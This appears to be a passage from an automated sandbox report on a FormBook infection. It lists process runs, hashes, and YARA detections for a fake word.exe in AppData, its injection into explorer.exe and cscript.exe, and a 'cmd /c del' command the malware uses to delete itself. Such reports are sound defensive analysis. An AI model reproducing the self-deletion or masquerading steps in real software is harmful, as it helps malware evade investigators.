                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:08:05:41
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\word.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\word.exe
                                            Imagebase:0x400000
                                            File size:248302 bytes
                                            MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 42%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:08:05:42
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\word.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\word.exe
                                            Imagebase:0x400000
                                            File size:248302 bytes
                                            MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:08:05:45
                                            Start date:14/01/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0xffa10000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:08:06:08
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cscript.exe
                                            Imagebase:0x8c0000
                                            File size:126976 bytes
                                            MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:08:06:12
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\AppData\Roaming\word.exe"
                                            Imagebase:0x4ace0000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis
